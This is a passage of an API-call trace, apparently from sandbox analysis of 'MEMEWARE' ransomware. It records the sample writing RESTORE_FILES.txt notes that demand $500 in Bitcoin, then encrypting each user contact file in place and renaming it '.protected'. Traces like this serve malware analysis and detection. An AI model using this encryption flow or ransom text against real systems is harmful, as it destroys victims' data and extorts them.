state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.106] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.107] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.107] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.107] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.107] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.107] CloseHandle (hObject=0xb4) returned 1 [0091.107] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.107] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.107] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\RESTORE_FILES.txt") returned 59 [0091.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.108] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.108] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.108] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.108] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.108] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.108] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0091.108] CloseHandle (hObject=0xa4) returned 1 [0091.109] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0091.109] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0091.109] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned 50 [0091.109] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0091.109] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0091.109] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*") returned 52 [0091.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0091.109] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="Windows") returned -1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="Program Files") returned -1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="Program Files (x86)") returned -1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="$Recycle.bin") returned 1 [0091.109] lstrcmpiW (lpString1="Contacts", lpString2="System Volume Information") returned -1 [0091.109] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 42 [0091.109] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0091.109] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0091.109] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*") returned 44 [0091.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.109] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.109] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.110] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.110] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.110] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.110] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.") returned 44 [0091.110] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.110] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.110] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.110] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.110] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.110] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.110] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.110] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.110] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.110] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.110] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.110] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\..") returned 45 [0091.110] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.110] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.110] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.110] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.110] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.110] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.110] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.110] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Windows") returned -1 [0091.111] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Program Files") returned -1 [0091.111] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Program Files (x86)") returned -1 [0091.111] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="$Recycle.bin") returned 1 [0091.111] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="System Volume Information") returned -1 [0091.111] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0091.111] StrStrIW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".protected") returned 0x0 [0091.111] lstrcmpW (lpString1="Aclviho ASldjfl.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.111] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.111] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0091.111] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".txt") returned 0x0 [0091.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0091.111] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".rar") returned 0x0 [0091.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0091.111] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".zip") returned 0x0 [0091.111] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x49a, lpOverlapped=0x0) returned 1 [0091.118] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.118] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x49a, lpOverlapped=0x0) returned 1 [0091.119] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.119] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.119] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.119] CloseHandle (hObject=0xb4) returned 1 [0091.120] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.protected") returned 76 [0091.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.protected")) returned 1 [0091.120] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="Windows") returned -1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="Program Files") returned -1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="Program Files (x86)") returned -1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="$Recycle.bin") returned 1 [0091.120] lstrcmpiW (lpString1="Administrator.contact", lpString2="System Volume Information") returned -1 [0091.120] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0091.120] StrStrIW (lpFirst="Administrator.contact", lpSrch=".protected") returned 0x0 [0091.120] lstrcmpW (lpString1="Administrator.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.120] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.120] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0091.121] StrStrW (lpFirst="Administrator.contact", lpSrch=".txt") returned 0x0 [0091.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0091.121] StrStrW (lpFirst="Administrator.contact", lpSrch=".rar") returned 0x0 [0091.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0091.121] StrStrW (lpFirst="Administrator.contact", lpSrch=".zip") returned 0x0 [0091.121] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.131] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.131] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.132] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.132] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.132] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.132] CloseHandle (hObject=0xb4) returned 1 [0091.133] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.protected") returned 74 [0091.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.protected")) returned 1 [0091.134] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Windows") returned -1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Program Files") returned -1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Program Files (x86)") returned -1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="$Recycle.bin") returned 1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="System Volume Information") returned -1 [0091.134] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0091.134] StrStrIW (lpFirst="asdlfk poopvy.contact", lpSrch=".protected") returned 0x0 [0091.134] lstrcmpW (lpString1="asdlfk poopvy.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.134] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.134] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0091.134] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch=".txt") returned 0x0 [0091.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0091.134] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch=".rar") returned 0x0 [0091.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0091.134] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch=".zip") returned 0x0 [0091.135] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x493, lpOverlapped=0x0) returned 1 [0091.139] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.139] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x493, lpOverlapped=0x0) returned 1 [0091.139] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.139] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.139] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.139] CloseHandle (hObject=0xb4) returned 1 [0091.140] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.protected") returned 74 [0091.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.protected")) returned 1 [0091.140] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.140] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Windows") returned -1 [0091.141] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Program Files") returned -1 [0091.141] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Program Files (x86)") returned -1 [0091.141] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="$Recycle.bin") returned 1 [0091.141] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="System Volume Information") returned -1 [0091.141] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0091.141] StrStrIW (lpFirst="chucu jadnvk.contact", lpSrch=".protected") returned 0x0 [0091.141] lstrcmpW (lpString1="chucu jadnvk.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.141] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.141] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.141] CreateFileW 